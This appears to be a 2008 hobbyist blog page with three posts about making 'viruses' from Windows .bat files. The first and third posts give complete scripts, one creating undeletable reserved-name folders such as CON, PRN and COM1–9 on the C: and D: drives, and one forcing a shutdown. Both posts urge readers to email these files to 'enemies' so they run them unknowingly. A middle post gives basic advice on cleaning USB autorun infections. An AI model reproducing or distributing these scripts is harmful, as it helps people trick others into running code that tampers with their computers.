Wednesday, July 30, 2008

Create folder Virus

Create folders which cannot be deleted (VIRUS)

In my bloges I have been giving you some ideas on how to create some simple viruses using .bat file here I am gonna show you haw to create a virus (.bat file) to create some unwanted folders in the hard disk.

Oh! Then they can easily delete the folders?

No this folders cannot be deleted as the way we normally delete the folders. So the normal computer users will not be able to delete this folders. If you wanna check this you can try this at your own computer with your own risk.

Ok let’s see how to create the virus

Just copy and past the highlighted lines in a notepad and save it as anyname.bat (you can give any name but the .bat extension should be there). this virus will create folders in “C”,”D” drives with the following names con, PRN, AUX, COM0, act..

@ECHO OFF

ECHO CREATING FOLDERS IN "C" DRIVE

md\\.\\C:\con

md\\.\\C:\PRN

md\\.\\C:\AUX

md\\.\\C:\COM0

md\\.\\C:\COM1

md\\.\\C:\COM2

md\\.\\C:\COM3

md\\.\\C:\COM4

md\\.\\C:\COM5

md\\.\\C:\COM6

md\\.\\C:\COM7

md\\.\\C:\COM8

md\\.\\C:\COM9

md\\.\\C:\LPT0

md\\.\\C:\LPT1

md\\.\\C:\LPT2

md\\.\\C:\LPT3

md\\.\\C:\LPT4

md\\.\\C:\LPT5

md\\.\\C:\LPT6

md\\.\\C:\LPT7

md\\.\\C:\LPT8

md\\.\\C:\LPT9

ECHO CREATING FOLDERS IN "D" DRIVE

md\\.\\D:\con

md\\.\\D:\PRN

md\\.\\D:\AUX

md\\.\\D:\COM0

md\\.\\D:\COM1

md\\.\\D:\COM2

md\\.\\D:\COM3

md\\.\\D:\COM4

md\\.\\D:\COM5

md\\.\\D:\COM6

md\\.\\D:\COM7

md\\.\\D:\COM8

md\\.\\D:\COM9

md\\.\\D:\LPT0

md\\.\\D:\LPT1

md\\.\\D:\LPT2

md\\.\\D:\LPT3

md\\.\\D:\LPT4

md\\.\\D:\LPT5

md\\.\\D:\LPT6

md\\.\\D:\LPT7

md\\.\\D:\LPT8

md\\.\\D:\LPT9

After you done you can send this anyname.bat file to your enemy or friends through e-mail or any other possible way to have some fun and put them in trouble when they going to delete these folders. when they run the anyname.bat file they will get the unwanted folders in they’re computer and when they try to delete those folders he he he funy you know ! you can prove there are fools.

Itsme

(Do this at your own risk I’m not responsible for anything)

For more information Wright me on itsiam@yahoo.com or leave a comment here .

Protect your computer from VIRUS

Protect your computer from VIRUS

Most of the viruses spread through the USB/Pen drives. Commonly viruses such as fun.exe, New Folder.exe, Pissu.exe etc.. are spreading through USB drives. Most anti virus programs are unable to detect and delete them.

How to delete these kinds of viruses?

  • Once you plug the USB/Pen drive open the task manager and check whether the suspicious files are being executed (example fun.exe, pissu.exe, Drivgard.exe ect..)
  • If any suspicious files are being executed then right click the particular process and click End Process.
  • open the command prompt (cmd.exe)
  • Locate the path to the USB/Pen drive (if your USB/Pen drives driver later is "I" then type "I:" to locate the path )
  • Type the following in the command prompt "attrib -a -r -h –s /s /d" (this command will remove the Archive, Read Only, Hide, System File attribute from the folders located in the "I" (USB/Pen drive)
  • Now open the My Computer and right click the USB/Pen drive and click explore (If u just double click and open the USB/Pen drive the autorun.inf file will make the virus to execute if there are any virus in the USB/Pen drive)
  • After you explore your USB/Pen drive delete the suspicious files located in your USB/Pen drive (example autorun.inf, fun.exe, pissu.exe)
  • If you can't delete these files try deleting the files using command prompt.
  • Hope you will be success in deleting the virus

(guys sorry 4 my poor English)

Right me on itsiam@yahoo.com for more information and ideas.

Create Virus Using .bat file

Create Virus

Guys do you really want to make some viruses with the little knowledge about bat files then you are at right place. This is basically the first step into making viruses

What you can do with the bat files

  • You can shutdown the computer
  • You can restart the computer
  • You can hide the folders and files
  • You can delete files in the computer
  • Ect…

Ok … guys will do one of these practically

Ok now will create a Simple .bat file to shutdown the computer

Open notepad

And type or copy the following (yellow) line and past in the notepad.

Shutdown -s -t 30 -c “any message goes here”

Then save the notepad with anyname.bat (.bat extension should be there)

Now you can send it to your enemy through e-mail and have fun.

When your enemy dabble click and open the anyname.bat file his/her computer will shutdown within 30 seconds

Ah guys are you expecting me to give other 3 samples to you HEY ! guys don’t expect to get everything from others, you try those things by your self and MAKE YOUR ENEMY SIT HIM SELF. (Sorry 4 my poor English)

(Do all this at your own risk I’m not responsible 4 what you do)

Right me on itsiam@yahoo.com for more information and ideas

Labels: